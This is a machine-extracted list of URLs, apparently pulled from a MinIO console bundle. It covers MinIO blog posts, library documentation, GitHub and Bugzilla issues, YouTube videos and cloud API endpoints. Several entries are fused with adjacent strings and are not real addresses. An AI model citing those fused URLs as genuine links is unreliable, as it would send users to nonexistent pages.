[https://github.com/tc39/proposal-shadowrealm/pull/384](https%3A%2F%2Fgithub.com%2Ftc39%2Fproposal-shadowrealm%2Fpull%2F384)
[https://redux-toolkit.js.org/api/getDefaultMiddleware](https%3A%2F%2Fredux-toolkit.js.org%2Fapi%2FgetDefaultMiddleware)
[https://vault.azure.net/mysql.database.azure.comhttps](https%3A%2F%2Fvault.azure.net%2Fmysql.database.azure.comhttps)
[https://www.googleapis.com/auth/cloud-platformstorage](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platformstorage)
[https://blog.min.io/introducing-speedtest-for-minio/](https%3A%2F%2Fblog.min.io%2Fintroducing-speedtest-for-minio%2F)
[https://blog.min.io/minio-openid-connect-integration](https%3A%2F%2Fblog.min.io%2Fminio-openid-connect-integration)
[https://bugzilla.mozilla.org/show_bug.cgi?id=1023984](https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D1023984)
[https://bugzilla.mozilla.org/show_bug.cgi?id=1414602](https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D1414602)
[https://code.google.com/p/smhasher/wiki/MurmurHash3.](https%3A%2F%2Fcode.google.com%2Fp%2Fsmhasher%2Fwiki%2FMurmurHash3.)
[https://min.io/resources/img/logo/MINIO_wordmark.png](https%3A%2F%2Fmin.io%2Fresources%2Fimg%2Flogo%2FMINIO_wordmark.png)
[https://oauth2.mtls.googleapis.com/tokenedwards25519](https%3A%2F%2Foauth2.mtls.googleapis.com%2Ftokenedwards25519)
[https://ossrdbms-aad.database.usgovcloudapi.nethttps](https%3A%2F%2Fossrdbms-aad.database.usgovcloudapi.nethttps)
[https://unpkg.com/rapidoc/dist/rapidoc-min.jsdisplay](https%3A%2F%2Funpkg.com%2Frapidoc%2Fdist%2Frapidoc-min.jsdisplay)
[https://blog.min.io/hybrid-cloud-red-hat-openshift/](https%3A%2F%2Fblog.min.io%2Fhybrid-cloud-red-hat-openshift%2F)
[https://blog.min.io/introducing-webhooks-for-minio/](https%3A%2F%2Fblog.min.io%2Fintroducing-webhooks-for-minio%2F)
[https://blog.min.io/the-beauty-of-the-panic-button/](https%3A%2F%2Fblog.min.io%2Fthe-beauty-of-the-panic-button%2F)
[https://bugzilla.mozilla.org/show_bug.cgi?id=664884](https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D664884)
[https://bugzilla.mozilla.org/show_bug.cgi?id=726227](https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D726227)
[https://bugzilla.mozilla.org/show_bug.cgi?id=878297](https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D878297)
[https://fb.me/react-async-component-lifecycle-hooks](https%3A%2F%2Ffb.me%2Freact-async-component-lifecycle-hooks)
[https://github.com/Microsoft/TypeScript/issues/3496](https%3A%2F%2Fgithub.com%2FMicrosoft%2FTypeScript%2Fissues%2F3496)
[https://github.com/MikeMcl/decimal.js-light/LICENCE](https%3A%2F%2Fgithub.com%2FMikeMcl%2Fdecimal.js-light%2FLICENCE)
[https://github.com/Rob--W/open-in-browser/issues/26](https%3A%2F%2Fgithub.com%2FRob--W%2Fopen-in-browser%2Fissues%2F26)
[https://github.com/sindresorhus/github-markdown-css](https%3A%2F%2Fgithub.com%2Fsindresorhus%2Fgithub-markdown-css)
[https://html.spec.whatwg.org/multipage/parsing.html](https%3A%2F%2Fhtml.spec.whatwg.org%2Fmultipage%2Fparsing.html)
[https://ossrdbms-aad.database.chinacloudapi.cnhttps](https%3A%2F%2Fossrdbms-aad.database.chinacloudapi.cnhttps)
[https://reactrouter.com/hooks/use-in-router-context](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-in-router-context)
[https://unpkg.com/detect-gpu@5.0.38/dist/benchmarks](https%3A%2F%2Funpkg.com%2Fdetect-gpu%405.0.38%2Fdist%2Fbenchmarks)
[https://www.particleincell.com/2012/bezier-splines/](https%3A%2F%2Fwww.particleincell.com%2F2012%2Fbezier-splines%2F)
[https://blog.min.io/multi-site-replication-resync/](https%3A%2F%2Fblog.min.io%2Fmulti-site-replication-resync%2F)
[https://blog.min.io/secure-hybrid-cloud-minio-iam/](https%3A%2F%2Fblog.min.io%2Fsecure-hybrid-cloud-minio-iam%2F)
[https://blog.min.io/troubleshooting-disk-failures/](https%3A%2F%2Fblog.min.io%2Ftroubleshooting-disk-failures%2F)
[https://bugs.chromium.org/p/v8/issues/detail?id=90](https%3A%2F%2Fbugs.chromium.org%2Fp%2Fv8%2Fissues%2Fdetail%3Fid%3D90)
[https://en.wikipedia.org/wiki/Cubic_Hermite_spline](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FCubic_Hermite_spline)
[https://esbench.com/bench/5bfee68a4cd7e6009ef61d23](https%3A%2F%2Fesbench.com%2Fbench%2F5bfee68a4cd7e6009ef61d23)
[https://fonts.googleapis.com/css?family=Montserrat](https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DMontserrat)
[https://github.com/remarkjs/remark-react/issues/64](https%3A%2F%2Fgithub.com%2Fremarkjs%2Fremark-react%2Fissues%2F64)
[https://github.com/syntax-tree/mdast-util-footnote](https%3A%2F%2Fgithub.com%2Fsyntax-tree%2Fmdast-util-footnote)
[https://github.com/thysultan/stylis.js/tree/v3.5.4](https%3A%2F%2Fgithub.com%2Fthysultan%2Fstylis.js%2Ftree%2Fv3.5.4)
[https://min.io/docs/minio/linux/index.html?ref=con](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Findex.html%3Fref%3Dcon)
[https://redux.js.org/usage/deriving-data-selectors](https%3A%2F%2Fredux.js.org%2Fusage%2Fderiving-data-selectors)
[https://blog.min.io/subnet-call-home-diagnostics/](https%3A%2F%2Fblog.min.io%2Fsubnet-call-home-diagnostics%2F)
[https://blog.min.io/transparent-data-compression/](https%3A%2F%2Fblog.min.io%2Ftransparent-data-compression%2F)
[https://github.com/acacode/swagger-typescript-api](https%3A%2F%2Fgithub.com%2Facacode%2Fswagger-typescript-api)
[https://github.com/jamiebuilds/tinykeys/issues/37](https%3A%2F%2Fgithub.com%2Fjamiebuilds%2Ftinykeys%2Fissues%2F37)
[https://github.com/jashkenas/underscore/pull/1247](https%3A%2F%2Fgithub.com%2Fjashkenas%2Funderscore%2Fpull%2F1247)
[https://github.com/ljharb/object.assign/issues/17](https%3A%2F%2Fgithub.com%2Fljharb%2Fobject.assign%2Fissues%2F17)
[https://github.com/mikolalysenko/interval-tree-1d](https%3A%2F%2Fgithub.com%2Fmikolalysenko%2Finterval-tree-1d)
[https://mathiasbynens.be/notes/javascript-unicode](https%3A%2F%2Fmathiasbynens.be%2Fnotes%2Fjavascript-unicode)
[https://min.io/docs/minio/linux/index.htmlinvalid](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Findex.htmlinvalid)
[https://rawgit.com/w3c/input-events/v1/index.html](https%3A%2F%2Frawgit.com%2Fw3c%2Finput-events%2Fv1%2Findex.html)
[https://reactrouter.com/hooks/use-navigation-type](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-navigation-type)
[https://reactrouter.com/routers/picking-a-router.](https%3A%2F%2Freactrouter.com%2Frouters%2Fpicking-a-router.)
[https://slack.min.ioMINIO_API_REPLICATION_WORKERS](https%3A%2F%2Fslack.min.ioMINIO_API_REPLICATION_WORKERS)
[https://blog.min.io/data-authenticity-integrity/](https%3A%2F%2Fblog.min.io%2Fdata-authenticity-integrity%2F)
[https://blog.min.io/subnet-series-communication/](https%3A%2F%2Fblog.min.io%2Fsubnet-series-communication%2F)
[https://blog.min.io/supportability-minio-subnet/](https%3A%2F%2Fblog.min.io%2Fsupportability-minio-subnet%2F)
[https://blog.min.io/why_our_customers_subscribe/](https%3A%2F%2Fblog.min.io%2Fwhy_our_customers_subscribe%2F)
[https://dev.azuresynapse.usgovcloudapi.netunable](https%3A%2F%2Fdev.azuresynapse.usgovcloudapi.netunable)
[https://enterprise-updates.ic.min.devconcurrency](https%3A%2F%2Fenterprise-updates.ic.min.devconcurrency)
[https://github.com/radix-ui/primitives/pull/1378](https%3A%2F%2Fgithub.com%2Fradix-ui%2Fprimitives%2Fpull%2F1378)
[https://github.com/recharts/recharts/issues/2143](https%3A%2F%2Fgithub.com%2Frecharts%2Frecharts%2Fissues%2F2143)
[https://github.com/recharts/recharts/issues/3669](https%3A%2F%2Fgithub.com%2Frecharts%2Frecharts%2Fissues%2F3669)
[https://github.com/visionmedia/css-parse/pull/49](https%3A%2F%2Fgithub.com%2Fvisionmedia%2Fcss-parse%2Fpull%2F49)
[https://github.com/wooorm/svg-element-attributes](https%3A%2F%2Fgithub.com%2Fwooorm%2Fsvg-element-attributes)
[https://oauth2.googleapis.com/tokenoauth2/google](https%3A%2F%2Foauth2.googleapis.com%2Ftokenoauth2%2Fgoogle)
[https://reactrouter.com/hooks/use-outlet-context](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-outlet-context)
[https://reactrouter.com/router-components/router](https%3A%2F%2Freactrouter.com%2Frouter-components%2Frouter)
[https://s3.amazonaws.com/v3/info-service-account](https%3A%2F%2Fs3.amazonaws.com%2Fv3%2Finfo-service-account)
[https://tools.ietf.org/rfcdiff?difftype=--hwdiff](https%3A%2F%2Ftools.ietf.org%2Frfcdiff%3Fdifftype%3D--hwdiff)
[https://www.w3.org/wiki/HTML/Elements/input/file](https%3A%2F%2Fwww.w3.org%2Fwiki%2FHTML%2FElements%2Finput%2Ffile)
[https://blog.min.io/c-e-compression-encryption/](https%3A%2F%2Fblog.min.io%2Fc-e-compression-encryption%2F)
[https://blog.min.io/s3-security-access-control/](https%3A%2F%2Fblog.min.io%2Fs3-security-access-control%2F)
[https://github.com/ladjs/superagent/issues/1680](https%3A%2F%2Fgithub.com%2Fladjs%2Fsuperagent%2Fissues%2F1680)
[https://github.com/sindresorhus/serialize-error](https%3A%2F%2Fgithub.com%2Fsindresorhus%2Fserialize-error)
[https://html.spec.whatwg.org/multipage/dnd.html](https%3A%2F%2Fhtml.spec.whatwg.org%2Fmultipage%2Fdnd.html)
[https://man7.org/linux/man-pages/man1/df.1.html](https%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman1%2Fdf.1.html)
[https://management.core.usgovcloudapi.net/https](https%3A%2F%2Fmanagement.core.usgovcloudapi.net%2Fhttps)
[https://microsoftgraph.chinacloudapi.cn/storage](https%3A%2F%2Fmicrosoftgraph.chinacloudapi.cn%2Fstorage)
[https://reactrouter.com/hooks/use-resolved-path](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-resolved-path)
[https://www.gnu.org/licenses/agpl-3.0.htmlTotal](https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fagpl-3.0.htmlTotal)
[https://www.styled-components.com/docs/advanced](https%3A%2F%2Fwww.styled-components.com%2Fdocs%2Fadvanced)
[https://accounts.google.com/o/oauth2/authhttps](https%3A%2F%2Faccounts.google.com%2Fo%2Foauth2%2Fauthhttps)
[https://blog.min.io/introducing-subnet-health/](https%3A%2F%2Fblog.min.io%2Fintroducing-subnet-health%2F)
[https://bugs.webkit.org/show_bug.cgi?id=156034](https%3A%2F%2Fbugs.webkit.org%2Fshow_bug.cgi%3Fid%3D156034)
[https://cosmos.azure.comgcloud-golang-storage/](https%3A%2F%2Fcosmos.azure.comgcloud-golang-storage%2F)
[https://fontforge.org/docs/techref/bezier.html](https%3A%2F%2Ffontforge.org%2Fdocs%2Ftechref%2Fbezier.html)
[https://fusejs.io/concepts/scoring-theory.html](https%3A%2F%2Ffusejs.io%2Fconcepts%2Fscoring-theory.html)
[https://github.com/bgrins/TinyColor/issues/254](https%3A%2F%2Fgithub.com%2Fbgrins%2FTinyColor%2Fissues%2F254)
[https://github.com/golang/protobuf/issues/1609](https%3A%2F%2Fgithub.com%2Fgolang%2Fprotobuf%2Fissues%2F1609)
[https://github.com/recharts/recharts/pull/2925](https%3A%2F%2Fgithub.com%2Frecharts%2Frecharts%2Fpull%2F2925)
[https://github.com/recharts/recharts/pull/3327](https%3A%2F%2Fgithub.com%2Frecharts%2Frecharts%2Fpull%2F3327)
[https://iamcredentials.mtls.googleapis.com/urn](https%3A%2F%2Fiamcredentials.mtls.googleapis.com%2Furn)
[https://management.core.chinacloudapi.cn/https](https%3A%2F%2Fmanagement.core.chinacloudapi.cn%2Fhttps)
[https://microsoftgraph.chinacloudapi.cnstorage](https%3A%2F%2Fmicrosoftgraph.chinacloudapi.cnstorage)
[https://ossrdbms-aad.database.windows.nethttps](https%3A%2F%2Fossrdbms-aad.database.windows.nethttps)
[https://pkg.go.dev/cloud.google.com/go/storage](https%3A%2F%2Fpkg.go.dev%2Fcloud.google.com%2Fgo%2Fstorage)
[https://redux-toolkit.js.org/api/createReducer](https%3A%2F%2Fredux-toolkit.js.org%2Fapi%2FcreateReducer)
[https://blog.min.io/renewing-kes-certificate/](https%3A%2F%2Fblog.min.io%2Frenewing-kes-certificate%2F)
[https://datatracker.ietf.org/doc/html/rfc7231](https%3A%2F%2Fdatatracker.ietf.org%2Fdoc%2Fhtml%2Frfc7231)
[https://datatracker.ietf.org/doc/html/rfc7540](https%3A%2F%2Fdatatracker.ietf.org%2Fdoc%2Fhtml%2Frfc7540)
[https://github.com/browserify/path-browserify](https%3A%2F%2Fgithub.com%2Fbrowserify%2Fpath-browserify)
[https://github.com/facebook/hermes/issues/274](https%3A%2F%2Fgithub.com%2Ffacebook%2Fhermes%2Fissues%2F274)
[https://github.com/remix-run/remix/issues/927](https%3A%2F%2Fgithub.com%2Fremix-run%2Fremix%2Fissues%2F927)
[https://iamcredentials.googleapis.com/invalid](https%3A%2F%2Fiamcredentials.googleapis.com%2Finvalid)
[https://min.io/docs/minio/linux/glossary.html](https%3A%2F%2Fmin.io%2Fdocs%2Fminio%2Flinux%2Fglossary.html)
[https://min.io/subscriptionclient/coordinator](https%3A%2F%2Fmin.io%2Fsubscriptionclient%2Fcoordinator)
[https://oauth2.googleapis.com/device/codeauth](https%3A%2F%2Foauth2.googleapis.com%2Fdevice%2Fcodeauth)
[https://reactjs.org/docs/hooks-reference.html](https%3A%2F%2Freactjs.org%2Fdocs%2Fhooks-reference.html)
[https://subnet.min.io/cluster/register?token=](https%3A%2F%2Fsubnet.min.io%2Fcluster%2Fregister%3Ftoken%3D)
[https://www.gnu.org/licenses/agpl-3.0.en.html](https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fagpl-3.0.en.html)
[https://www.styled-components.com/docs/basics](https%3A%2F%2Fwww.styled-components.com%2Fdocs%2Fbasics)
[https://github.com/cburgmer/rasterizeHTML.js](https%3A%2F%2Fgithub.com%2Fcburgmer%2FrasterizeHTML.js)
[https://github.com/facebook/react/pull/26395](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fpull%2F26395)
[https://github.com/minio/minio-go/issues.The](https%3A%2F%2Fgithub.com%2Fminio%2Fminio-go%2Fissues.The)
[https://github.com/minio/minio-go/issues.sum](https%3A%2F%2Fgithub.com%2Fminio%2Fminio-go%2Fissues.sum)
[https://github.com/sindresorhus/got/pull/537](https%3A%2F%2Fgithub.com%2Fsindresorhus%2Fgot%2Fpull%2F537)
[https://iamcredentials.UNIVERSE_DOMAIN/error](https%3A%2F%2Fiamcredentials.UNIVERSE_DOMAIN%2Ferror)
[https://kubernetes.default.svc/versionfailed](https%3A%2F%2Fkubernetes.default.svc%2Fversionfailed)
[https://redux-toolkit.js.org/api/createSlice](https%3A%2F%2Fredux-toolkit.js.org%2Fapi%2FcreateSlice)
[https://stackoverflow.com/a/51127130/4671932](https%3A%2F%2Fstackoverflow.com%2Fa%2F51127130%2F4671932)
[https://storage.googleapis.com/storage/v1/b/](https%3A%2F%2Fstorage.googleapis.com%2Fstorage%2Fv1%2Fb%2F)
[https://www.gnu.org/licenses/gpl-faq.en.html](https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fgpl-faq.en.html)
[https://blog.min.io/erasure-coding-vs-raid/](https%3A%2F%2Fblog.min.io%2Ferasure-coding-vs-raid%2F)
[https://console-endpoint-url/oauth_callback](https%3A%2F%2Fconsole-endpoint-url%2Foauth_callback)
[https://en.wikipedia.org/wiki/ISO_week_date](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FISO_week_date)
[https://en.wikipedia.org/wiki/Vacuous_truth](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FVacuous_truth)
[https://github.com/facebook/react/pull/7081](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fpull%2F7081)
[https://github.com/facebook/react/pull/7515](https%3A%2F%2Fgithub.com%2Ffacebook%2Freact%2Fpull%2F7515)
[https://github.com/jonschlinkert/mixin-deep](https%3A%2F%2Fgithub.com%2Fjonschlinkert%2Fmixin-deep)
[https://github.com/nodejs/node/issues/17469](https%3A%2F%2Fgithub.com%2Fnodejs%2Fnode%2Fissues%2F17469)
[https://github.com/tc39/proposal-observable](https%3A%2F%2Fgithub.com%2Ftc39%2Fproposal-observable)
[https://reactrouter.com/components/navigate](https%3A%2F%2Freactrouter.com%2Fcomponents%2Fnavigate)
[https://reactrouter.com/utils/generate-path](https%3A%2F%2Freactrouter.com%2Futils%2Fgenerate-path)
[https://subnet.min.io/terms-and-conditions/](https%3A%2F%2Fsubnet.min.io%2Fterms-and-conditions%2F)
[https://www.electronjs.org/docs/api/process](https%3A%2F%2Fwww.electronjs.org%2Fdocs%2Fapi%2Fprocess)
[https://www.gnu.org/licenses/agpl-3.0.html.](https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fagpl-3.0.html.)
[https://www.youtube.com/watch?v=-PjTSwLB8ZA](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D-PjTSwLB8ZA)
[https://www.youtube.com/watch?v=0PgMxz0HauA](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D0PgMxz0HauA)
[https://www.youtube.com/watch?v=5fz3rE3wjGg](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D5fz3rE3wjGg)
[https://www.youtube.com/watch?v=5ptKrZzOs4c](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D5ptKrZzOs4c)
[https://www.youtube.com/watch?v=7EJO_iRiB2s](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D7EJO_iRiB2s)
[https://www.youtube.com/watch?v=89vnToCcoAw](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D89vnToCcoAw)
[https://www.youtube.com/watch?v=A3vCDaFWNNs](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DA3vCDaFWNNs)
[https://www.youtube.com/watch?v=BLTlaOvVCSg](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DBLTlaOvVCSg)
[https://www.youtube.com/watch?v=CrBjB7vbI7M](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DCrBjB7vbI7M)
[https://www.youtube.com/watch?v=Exg2KsfzHzI](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DExg2KsfzHzI)
[https://www.youtube.com/watch?v=G4wQZEsIxcU](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DG4wQZEsIxcU)
[https://www.youtube.com/watch?v=Hk9Z-sltUu8](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DHk9Z-sltUu8)
[https://www.youtube.com/watch?v=Iz8ChZ7FRrw](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DIz8ChZ7FRrw)
[https://www.youtube.com/watch?v=KiWWVgfuulU](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DKiWWVgfuulU)
[https://www.youtube.com/watch?v=Oix9iXndSUY](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DOix9iXndSUY)
[https://www.youtube.com/watch?v=QniHMNNmbfI](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DQniHMNNmbfI)
[https://www.youtube.com/watch?v=UGROqu7mYJs](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DUGROqu7mYJs)
[https://www.youtube.com/watch?v=UuxqnUgowyg](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DUuxqnUgowyg)
[https://www.youtube.com/watch?v=XGOiwV6Cbuk](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DXGOiwV6Cbuk)
[https://www.youtube.com/watch?v=XUuJZVK-Wpw](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DXUuJZVK-Wpw)
[https://www.youtube.com/watch?v=Yh_1grPSBjw](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DYh_1grPSBjw)
[https://www.youtube.com/watch?v=Zyc-xhNcPco](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DZyc-xhNcPco)
[https://www.youtube.com/watch?v=_ZEjm4bPgVI](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D_ZEjm4bPgVI)
[https://www.youtube.com/watch?v=bZsNxeuzmYc](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DbZsNxeuzmYc)
[https://www.youtube.com/watch?v=dLSBuVG7Y3k](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DdLSBuVG7Y3k)
[https://www.youtube.com/watch?v=iCxcv4_j35M](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DiCxcv4_j35M)
[https://www.youtube.com/watch?v=mv8I1wvTCrE](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dmv8I1wvTCrE)
[https://www.youtube.com/watch?v=nFUI2N5zH34](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DnFUI2N5zH34)
[https://www.youtube.com/watch?v=sJEFAVqoKr0](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DsJEFAVqoKr0)
[https://www.youtube.com/watch?v=thNus-DL1u4](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DthNus-DL1u4)
[https://www.youtube.com/watch?v=vdHv9wfhu24](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DvdHv9wfhu24)
[https://www.youtube.com/watch?v=z2bRoMrQxv0](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dz2bRoMrQxv0)
[https://www.youtube.com/watch?v=zqjsw4O2-4U](https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dzqjsw4O2-4U)
[https://batch.core.usgovcloudapi.net/https](https%3A%2F%2Fbatch.core.usgovcloudapi.net%2Fhttps)
[https://blog.min.io/minio-gcp-marketplace/](https%3A%2F%2Fblog.min.io%2Fminio-gcp-marketplace%2F)
[https://gist.github.com/joelambert/1002116](https%3A%2F%2Fgist.github.com%2Fjoelambert%2F1002116)
[https://github.com/ungap/url-search-params](https%3A%2F%2Fgithub.com%2Fungap%2Furl-search-params)
[https://management.microsoftazure.de/empty](https%3A%2F%2Fmanagement.microsoftazure.de%2Fempty)
[https://management.usgovcloudapi.net/https](https%3A%2F%2Fmanagement.usgovcloudapi.net%2Fhttps)
[https://reactrouter.com/hooks/use-location](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-location)
[https://reactrouter.com/hooks/use-navigate](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-navigate)
[https://reactrouter.com/utils/match-routes](https%3A%2F%2Freactrouter.com%2Futils%2Fmatch-routes)
[https://reactrouter.com/utils/resolve-path](https%3A%2F%2Freactrouter.com%2Futils%2Fresolve-path)
[https://servicebus.usgovcloudapi.net/https](https%3A%2F%2Fservicebus.usgovcloudapi.net%2Fhttps)
[https://github.com/feross/queue-microtask](https%3A%2F%2Fgithub.com%2Ffeross%2Fqueue-microtask)
[https://github.com/minio/minio/issues.Set](https%3A%2F%2Fgithub.com%2Fminio%2Fminio%2Fissues.Set)
[https://github.com/sindresorhus/type-fest](https%3A%2F%2Fgithub.com%2Fsindresorhus%2Ftype-fest)
[https://github.com/visionmedia/superagent](https%3A%2F%2Fgithub.com%2Fvisionmedia%2Fsuperagent)
[https://iamcredentials.googleapis.com/v1/](https%3A%2F%2Fiamcredentials.googleapis.com%2Fv1%2F)
[https://management.chinacloudapi.cn/https](https%3A%2F%2Fmanagement.chinacloudapi.cn%2Fhttps)
[https://management.core.windows.net/https](https%3A%2F%2Fmanagement.core.windows.net%2Fhttps)
[https://reactrouter.com/components/outlet](https%3A%2F%2Freactrouter.com%2Fcomponents%2Foutlet)
[https://reactrouter.com/components/routes](https%3A%2F%2Freactrouter.com%2Fcomponents%2Froutes)
[https://servicebus.chinacloudapi.cn/https](https%3A%2F%2Fservicebus.chinacloudapi.cn%2Fhttps)
[https://sts.amazonaws.com/doc/2011-06-15/](https%3A%2F%2Fsts.amazonaws.com%2Fdoc%2F2011-06-15%2F)
[https://www.gnu.org/licenses/agpl-3.0.txt](https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fagpl-3.0.txt)
[https://blog.min.io/active-active-email/](https%3A%2F%2Fblog.min.io%2Factive-active-email%2F)
[https://github.com/jonschlinkert/kind-of](https%3A%2F%2Fgithub.com%2Fjonschlinkert%2Fkind-of)
[https://login.microsoftonline.de/storage](https%3A%2F%2Flogin.microsoftonline.de%2Fstorage)
[https://reactrouter.com/hooks/use-params](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-params)
[https://reactrouter.com/hooks/use-routes](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-routes)
[https://reactrouter.com/utils/match-path](https%3A%2F%2Freactrouter.com%2Futils%2Fmatch-path)
[https://storage.googleapis.com/duplicate](https%3A%2F%2Fstorage.googleapis.com%2Fduplicate)
[https://www.robotstxt.org/robotstxt.html](https%3A%2F%2Fwww.robotstxt.org%2Frobotstxt.html)
[https://www.w3.org/TR/SVG11/filters.html](https%3A%2F%2Fwww.w3.org%2FTR%2FSVG11%2Ffilters.html)
[https://database.chinacloudapi.cn/empty](https%3A%2F%2Fdatabase.chinacloudapi.cn%2Fempty)
[https://en.wikipedia.org/wiki/Empty_set](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FEmpty_set)
[https://github.com/niklasvh/html2canvas](https%3A%2F%2Fgithub.com%2Fniklasvh%2Fhtml2canvas)
[https://login.microsoftonline.com/https](https%3A%2F%2Flogin.microsoftonline.com%2Fhttps)
[https://reactrouter.com/hooks/use-match](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-match)
[https://sts.UNIVERSE_DOMAIN/v1/tokenurn](https%3A%2F%2Fsts.UNIVERSE_DOMAIN%2Fv1%2Ftokenurn)
[https://vault.microsoftazure.de/reflect](https%3A%2F%2Fvault.microsoftazure.de%2Freflect)
[https://en.wikipedia.org/wiki/ISO_8601](https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FISO_8601)
[https://github.com/minio/minio/issuesA](https%3A%2F%2Fgithub.com%2Fminio%2Fminio%2FissuesA)
[https://github.com/mourner/quickselect](https%3A%2F%2Fgithub.com%2Fmourner%2Fquickselect)
[https://github.com/wojtekmaj/react-pdf](https%3A%2F%2Fgithub.com%2Fwojtekmaj%2Freact-pdf)
[https://login.microsoftonline.us/https](https%3A%2F%2Flogin.microsoftonline.us%2Fhttps)
[https://manage.chinacloudapi.com/https](https%3A%2F%2Fmanage.chinacloudapi.com%2Fhttps)
[https://reactrouter.com/hooks/use-href](https%3A%2F%2Freactrouter.com%2Fhooks%2Fuse-href)
[https://vault.microsoftazure.dereflect](https%3A%2F%2Fvault.microsoftazure.dereflect)
[https://www.rfc-editor.org/rfc/rfc8297](https%3A%2F%2Fwww.rfc-editor.org%2Frfc%2Frfc8297)
[https://bugzilla.mozilla.org/1547776.](https%3A%2F%2Fbugzilla.mozilla.org%2F1547776.)
[https://httpwg.org/specs/rfc9110.html](https%3A%2F%2Fhttpwg.org%2Fspecs%2Frfc9110.html)
[https://manage.windowsazure.com/https](https%3A%2F%2Fmanage.windowsazure.com%2Fhttps)
[https://min.io/product/subnet?ref=con](https%3A%2F%2Fmin.io%2Fproduct%2Fsubnet%3Fref%3Dcon)
[https://protobuf.dev/reference/go/faq](https%3A%2F%2Fprotobuf.dev%2Freference%2Fgo%2Ffaq)
[https://batch.core.windows.net/https](https%3A%2F%2Fbatch.core.windows.net%2Fhttps)
[https://blog.min.io/kafka_and_minio/](https%3A%2F%2Fblog.min.io%2Fkafka_and_minio%2F)
[https://bugzilla.mozilla.org/1841972](https%3A%2F%2Fbugzilla.mozilla.org%2F1841972)
[https://github.com/mweststrate/immer](https%3A%2F%2Fgithub.com%2Fmweststrate%2Fimmer)
[https://graph.chinacloudapi.cn/https](https%3A%2F%2Fgraph.chinacloudapi.cn%2Fhttps)
[https://login.chinacloudapi.cn/https](https%3A%2F%2Flogin.chinacloudapi.cn%2Fhttps)
[https://manage.windowsazure.us/https](https%3A%2F%2Fmanage.windowsazure.us%2Fhttps)
[https://reactjs.org/docs/events.html](https%3A%2F%2Freactjs.org%2Fdocs%2Fevents.html)
[https://servicebus.cloudapi.de/https](https%3A%2F%2Fservicebus.cloudapi.de%2Fhttps)
[https://servicebus.windows.net/https](https%3A%2F%2Fservicebus.windows.net%2Fhttps)
[https://stackoverflow.com/a/25340456](https%3A%2F%2Fstackoverflow.com%2Fa%2F25340456)
[https://vault.usgovcloudapi.nethttps](https%3A%2F%2Fvault.usgovcloudapi.nethttps)
[https://blog.min.io/erasure-coding/](https%3A%2F%2Fblog.min.io%2Ferasure-coding%2F)
[https://tools.ietf.org/html/rfc2324](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc2324)
